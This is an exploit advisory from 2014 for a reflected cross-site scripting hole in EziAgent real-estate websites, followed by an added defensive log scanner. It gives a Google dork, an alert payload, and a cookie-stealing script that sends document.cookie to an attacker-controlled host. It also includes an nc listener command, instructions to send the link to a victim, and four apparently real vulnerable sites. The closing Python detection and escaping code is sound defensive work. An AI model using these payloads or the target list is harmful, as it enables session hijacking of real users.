
XSS vulnerability EziAgent include JavaScript

Author: Secret HaCk Sudan , Published: 24-07-2014
##############################################
#
# Title : XSS vulnerability EziAgent include JavaScript
#
##############################################
# Date : 24 / 7 / 2014
# Author : Secret HaCk Sudan
# Contact : fb/secret.hack.9
# Tested on : Kali Linux
##############################################
#
# Dork : --
#
# intext:"Powered by EziAgent" inurl:sid=
#
##############################################
# Explain :
# Copy and paste the dork into google.com,
# enter any site and delete all the text after sid=
# then paste this code after sid=
#
# "><SCrIpT>alert("DamaneDz,n4ss1m ,UzunDz ,Gastro-Dz, Jigsaw")<%2FScRiPt>
#
# press Enter
# now the alert should be shown
################################################
#
# Exploit :
#
# to steal cookies :
# first paste this code after sid=
#
# <script>new Image().src="http://XXXXX/secrethack.php"+document.cookie;</script>
#
# replace XXXXX with your IP and send the link to the victim
#
# then open your terminal and type this command
#
# nc -vv -l -p 80
#
# this command will listen on port 80 (the web port, the HTTP port)
#
# root@SecretHack: ~ # nc -vv -l -p 80
# listening on 80 ...
#
# now this terminal is waiting for the victim to click
#
# after the click, the cookies will be shown in the terminal in hash form
#
# crack it or use Tamper Data to bypass it
#
####################################################
# vulnerable sites for test : ---
#
# http://www.hitophomes.com/aprg/list/mypropdet.aspx?sid=
# http://homelifelandmark.ca/aprg/vcode.aspx?v=
# http://www.jdlrealty.ca/aprg/publicinfo/publicinfodetail.aspx?sid=
# http://www.marcosplopper.com/aprg/blog/category.aspx?sid=
#
####################################################
#
# Greets for : Sudan HaCking Group , Mr V , Maaroufi Mehdi ,
# zeus , Moalra , Tom Jons , Azzam Ezzat , Cutthroat Sudanese
# shaja organization , Attacker SD , SD attacker , Top Secret
# and All my Friends ^_^
#
####################################################
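
For site operators, the reflected sid= injection described above leaves percent-encoded markup in the web server's access log. The following added example (not part of the original advisory) flags such requests and shows the HTML-encoded form the page should have emitted; the log lines, client addresses and function names are constructed for illustration, with request paths modelled on the aprg/ paths listed above.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value break out of an attribute or tag.
MARKUP = re.compile(r'[<>"\']')
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode a few rounds so double-encoded markup (%253C) is still seen."""
    for _ in range(max_rounds):
        value = unquote(value)
    return value

def suspicious_sid(request_target):
    """Return the decoded sid value if it carries markup characters, else None."""
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == "sid":
            decoded = decode_fully(value)
            if MARKUP.search(decoded):
                return decoded
    return None

def scan(log_lines):
    """Return (client, decoded_sid) for each access-log line with a suspicious sid."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        hit = suspicious_sid(m.group(2)) if m else None
        if hit is not None:
            hits.append((m.group(1), hit))
    return hits

def render_safely(sid):
    """The fix on the server side: HTML-encode sid before writing it into the page."""
    return html.escape(sid, quote=True)

# Constructed sample log lines (combined log format, documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [24/Jul/2014:10:00:01 +0000] "GET /aprg/list/mypropdet.aspx?sid=4711 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Jul/2014:10:00:05 +0000] "GET /aprg/list/mypropdet.aspx?sid=%22%3E%3CSCrIpT%3Ealert(1)%3C%2FScRiPt%3E HTTP/1.1" 200 5230',
    '203.0.113.9 - - [24/Jul/2014:10:00:09 +0000] "GET /aprg/blog/category.aspx?sid=%253Cscript%253E HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for client, sid in scan(SAMPLE):
        print(client, repr(sid), "->", render_safely(sid))
```

Cookies marked HttpOnly are not readable through document.cookie, which limits what the cookie-stealing step above can obtain even where the injection itself is still present.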
